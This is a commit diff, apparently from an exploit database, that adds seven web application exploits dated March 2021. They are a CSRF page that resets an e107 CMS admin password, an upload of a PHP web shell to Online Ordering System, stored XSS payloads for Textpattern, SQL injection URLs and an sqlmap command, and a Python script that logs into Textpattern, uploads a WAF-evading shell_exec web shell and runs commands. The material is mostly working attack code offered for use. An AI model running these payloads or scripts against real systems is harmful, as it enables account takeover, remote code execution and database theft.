DB: 2021-03-05
8 changes to exploits/shellcodes e107 CMS 2.3.0 - CSRF Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS) Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS) Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated) Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
This commit is contained in:
parent
5edc6a08e0
commit
5572674576
9 changed files with 334 additions and 0 deletions
|
@ -4,6 +4,7 @@
|
||||||
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
|
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
|
||||||
# Version: 3.5
|
# Version: 3.5
|
||||||
# CWE : CWE-79
|
# CWE : CWE-79
|
||||||
|
# CVE: CVE-2020-23518
|
||||||
|
|
||||||
[Description]
|
[Description]
|
||||||
|
|
||||||
|
|
70
exploits/php/webapps/49614.txt
Normal file
70
exploits/php/webapps/49614.txt
Normal file
|
@ -0,0 +1,70 @@
|
||||||
|
# Exploit Title: e107 CMS 2.3.0 - CSRF
|
||||||
|
# Date: 04/03/2021
|
||||||
|
# Exploit Author: Tadjmen
|
||||||
|
# Vendor Homepage: https://e107.org
|
||||||
|
# Software Link: https://e107.org/download
|
||||||
|
# Version: 2.3.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE : CVE-2021-27885
|
||||||
|
|
||||||
|
CSRF vulnerability on e107 CMS
|
||||||
|
|
||||||
|
## Bug Description
|
||||||
|
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
|
||||||
|
|
||||||
|
## How to Reproduce
|
||||||
|
Steps to reproduce the behavior:
|
||||||
|
1. Create a CSRF login POC using the following code.
|
||||||
|
|
||||||
|
```
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body onload="javascript:fireForms()">
|
||||||
|
<script language="JavaScript">
|
||||||
|
|
||||||
|
function fireForms()
|
||||||
|
{
|
||||||
|
var count = 2;
|
||||||
|
var i=0;
|
||||||
|
|
||||||
|
for(i=0; i<count; i++)
|
||||||
|
{
|
||||||
|
document.forms[i].submit();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
|
||||||
|
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
|
||||||
|
|
||||||
|
<form method="POST" name="form0" action="
|
||||||
|
http://localhost/[path-to-e107-cms]/usersettings.php">
|
||||||
|
|
||||||
|
<input type="hidden" name="loginname" value="admin"/>
|
||||||
|
<input type="hidden" name="email" value="[email]"/>
|
||||||
|
<input type="hidden" name="password1" value="[password]"/>
|
||||||
|
<input type="hidden" name="password2" value="[password]"/>
|
||||||
|
<input type="hidden" name="hideemail" value="1"/>
|
||||||
|
<input type="hidden" name="image" value=""/>
|
||||||
|
<input type="hidden" name="signature" value=""/>
|
||||||
|
<input type="hidden" name="updatesettings" value="Save settings"/>
|
||||||
|
<input type="hidden" name="_uid" value="2"/>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
2. Replace the email and password with the valid credentials.
|
||||||
|
3. Send the link script to the victim (admin) to make them click.
|
||||||
|
4. Login with new admin password
|
79
exploits/php/webapps/49615.txt
Normal file
79
exploits/php/webapps/49615.txt
Normal file
|
@ -0,0 +1,79 @@
|
||||||
|
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
|
||||||
|
# Date: 04/03/2021
|
||||||
|
# Exploit Author: Suraj Bhosale
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on Windows 10, XAMPP
|
||||||
|
|
||||||
|
|
||||||
|
Request:
|
||||||
|
========
|
||||||
|
|
||||||
|
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
|
||||||
|
Gecko/20100101 Firefox/85.0
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data;
|
||||||
|
boundary=---------------------------14955282031852449676680360880
|
||||||
|
Content-Length: 972
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/onlineordering/GPST/store/index.php
|
||||||
|
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="transnum"
|
||||||
|
|
||||||
|
VAF-XAP
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="select1"
|
||||||
|
|
||||||
|
25
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="pname"
|
||||||
|
|
||||||
|
keychain
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="select2"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="txtDisplay"
|
||||||
|
|
||||||
|
25
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="note"
|
||||||
|
|
||||||
|
test
|
||||||
|
-----------------------------14955282031852449676680360880
|
||||||
|
Content-Disposition: form-data; name="image"; filename="shell.php"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
<?php echo "Shell";system($_GET['cmd']); ?>
|
||||||
|
-----------------------------14955282031852449676680360880--
|
||||||
|
|
||||||
|
Response:
|
||||||
|
=========
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Thu, 04 Mar 2021 13:28:27 GMT
|
||||||
|
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
|
||||||
|
X-Powered-By: PHP/7.3.27
|
||||||
|
Content-Length: 55
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
<meta http-equiv="refresh" content="1; url=index.php">
|
||||||
|
|
||||||
|
# Uploaded Malicious File can be Found in :
|
||||||
|
onlineordering\GPST\store\design
|
||||||
|
|
||||||
|
# go to
|
||||||
|
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
|
||||||
|
which will execute hostname command.
|
18
exploits/php/webapps/49616.txt
Normal file
18
exploits/php/webapps/49616.txt
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
|
||||||
|
# Date: 2021-03-04
|
||||||
|
# Exploit Author: Tushar Vaidya
|
||||||
|
# Vendor Homepage: https://textpattern.com
|
||||||
|
# Software Link: https://textpattern.com/start
|
||||||
|
# Version: v 4.8.4
|
||||||
|
# Tested on: Windows
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
1. Login into Textpattern CMS admin panel.
|
||||||
|
2. Now go to the *Content > C**omments > Message*.
|
||||||
|
3. Now paste the below payload in the URL field.
|
||||||
|
|
||||||
|
Ba1man”><img src=x onerror=confirm(document.location)>
|
||||||
|
|
||||||
|
4. Now click on the *Save* button.
|
||||||
|
5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
|
||||||
|
5. The XSS will be triggered.
|
18
exploits/php/webapps/49617.txt
Normal file
18
exploits/php/webapps/49617.txt
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
|
||||||
|
# Date: 2021-03-04
|
||||||
|
# Exploit Author: Tushar Vaidya
|
||||||
|
# Vendor Homepage: https://textpattern.com
|
||||||
|
# Software Link: https://textpattern.com/start
|
||||||
|
# Version: v 4.9.0-dev
|
||||||
|
# Tested on: Windows
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
1. Login into Textpattern CMS admin panel.
|
||||||
|
2. Now go to the *Content > Write > ** Excerpt*.
|
||||||
|
3. Now paste the below payload in the URL field.
|
||||||
|
|
||||||
|
Ba1man”><img src=x onerror=confirm(document.cookie)>
|
||||||
|
|
||||||
|
4. Now click on the *Save* button.
|
||||||
|
5. Now go to the *articles* page
|
||||||
|
5. The XSS will be triggered.
|
19
exploits/php/webapps/49618.txt
Normal file
19
exploits/php/webapps/49618.txt
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
|
||||||
|
# Date: 2021-03-04
|
||||||
|
# Exploit Author: Suraj Bhosale
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
|
||||||
|
# Version: v1.0
|
||||||
|
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
|
||||||
|
# Vulnerable Parameter: id
|
||||||
|
|
||||||
|
*Steps to Reproduce:*
|
||||||
|
1) Visit
|
||||||
|
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
|
||||||
|
2) Now fire up the following command into SQLMAP.
|
||||||
|
|
||||||
|
CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
|
||||||
|
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
|
||||||
|
--batch --dbs
|
||||||
|
|
||||||
|
3) Using the above command we will get the name of all the database.
|
18
exploits/php/webapps/49619.txt
Normal file
18
exploits/php/webapps/49619.txt
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
|
||||||
|
# Date: 04-03-2021
|
||||||
|
# Exploit Author: Deepak Kumar Bharti
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com
|
||||||
|
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
|
||||||
|
# Software: Web Based Quiz System
|
||||||
|
# Version: 1.0
|
||||||
|
|
||||||
|
# Tested on: Windows 10 Pro
|
||||||
|
# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
|
||||||
|
# in Welcome page in quiz section eid parameter affected from this vulnerability.
|
||||||
|
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
|
||||||
|
|
||||||
|
POC:
|
||||||
|
# go to url http://localhost/login.php
|
||||||
|
# then you have to login with default creds
|
||||||
|
# then go to quiz and execute the payload ie:--
|
||||||
|
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
|
104
exploits/php/webapps/49620.py
Executable file
104
exploits/php/webapps/49620.py
Executable file
|
@ -0,0 +1,104 @@
|
||||||
|
# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
|
||||||
|
# Date: 03/03/2021
|
||||||
|
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
|
||||||
|
# Vendor Homepage: https://textpattern.com/
|
||||||
|
# Software Link: https://textpattern.com/start
|
||||||
|
# Version: Previous to 4.8.3
|
||||||
|
# Tested on: CentOS, textpattern 4.5.7 and 4.6.0
|
||||||
|
# Install dependencies: pip3 install beautifulsoup4 argparse requests
|
||||||
|
# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import argparse
|
||||||
|
import requests
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
|
||||||
|
|
||||||
|
def get_args():
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
|
||||||
|
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
|
||||||
|
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
|
||||||
|
parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute')
|
||||||
|
parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload')
|
||||||
|
parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command')
|
||||||
|
my_args = parser.parse_args()
|
||||||
|
return my_args
|
||||||
|
|
||||||
|
|
||||||
|
def get_file_id(s, files_url, file_name):
|
||||||
|
r = s.get(files_url, verify=False)
|
||||||
|
soup = BeautifulSoup(r.text, "html.parser")
|
||||||
|
for a in soup.findAll('a'):
|
||||||
|
if "file_download/" in a['href']:
|
||||||
|
file_id_name = a['href'].split('file_download/')[1].split("/")
|
||||||
|
if file_id_name[1] == file_name:
|
||||||
|
file_id = file_id_name[0]
|
||||||
|
return file_id
|
||||||
|
|
||||||
|
|
||||||
|
def login(login_url, user, password):
|
||||||
|
s = requests.Session()
|
||||||
|
s.get(login_url, verify=False)
|
||||||
|
data = {"p_userid":user, "p_password":password, "_txp_token":""}
|
||||||
|
r = s.post(login_url, data=data, verify=False)
|
||||||
|
if str(r.status_code) == "401":
|
||||||
|
print("[+] Invalid credentials")
|
||||||
|
sys.exit(0)
|
||||||
|
_txp_token = ""
|
||||||
|
soup = BeautifulSoup(r.text, "html.parser")
|
||||||
|
fields = soup.findAll('input')
|
||||||
|
for f in fields:
|
||||||
|
if (f['name'] == "_txp_token"):
|
||||||
|
_txp_token = f['value']
|
||||||
|
return s,_txp_token
|
||||||
|
|
||||||
|
|
||||||
|
def upload(s, login_url, _txp_token, file_name):
|
||||||
|
php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems
|
||||||
|
php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>'
|
||||||
|
s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False)
|
||||||
|
|
||||||
|
|
||||||
|
def exec_cmd(s, cmd_url, command):
|
||||||
|
r = s.get(cmd_url+command, verify=False)
|
||||||
|
response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","")
|
||||||
|
return response
|
||||||
|
|
||||||
|
|
||||||
|
def delete_file(s, login_url, file_id, _txp_token):
|
||||||
|
data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token}
|
||||||
|
s.post(login_url, data=data, verify=False)
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
args = get_args()
|
||||||
|
url = args.target
|
||||||
|
user = args.user
|
||||||
|
password = args.password
|
||||||
|
file_name = args.filename
|
||||||
|
command = args.command
|
||||||
|
delete_after_execute = args.delete
|
||||||
|
|
||||||
|
login_url = url + "/textpattern/index.php"
|
||||||
|
upload_url = url + "/textpattern/index.php"
|
||||||
|
cmd_url = url + "/files/" + file_name + "?cmd="
|
||||||
|
files_url = url + "/textpattern/index.php?event=file"
|
||||||
|
|
||||||
|
s,_txp_token = login(login_url, user, password)
|
||||||
|
print("[+] Logged in")
|
||||||
|
upload(s, login_url, _txp_token, file_name)
|
||||||
|
file_id = get_file_id(s, files_url, file_name)
|
||||||
|
print("[+] File uploaded with id %s"%(file_id))
|
||||||
|
response = exec_cmd(s, cmd_url, command)
|
||||||
|
print("[+] Command output \n%s"%(response))
|
||||||
|
|
||||||
|
if delete_after_execute:
|
||||||
|
print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id))
|
||||||
|
delete_file(s, login_url, file_id, _txp_token)
|
||||||
|
else:
|
||||||
|
print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name))
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
|
@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port
|
||||||
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
|
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
|
||||||
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
|
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
|
||||||
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
|
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
|
||||||
|
49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php,
|
||||||
|
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php,
|
||||||
|
49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
|
||||||
|
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
|
||||||
|
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
|
||||||
|
49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
|
||||||
|
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue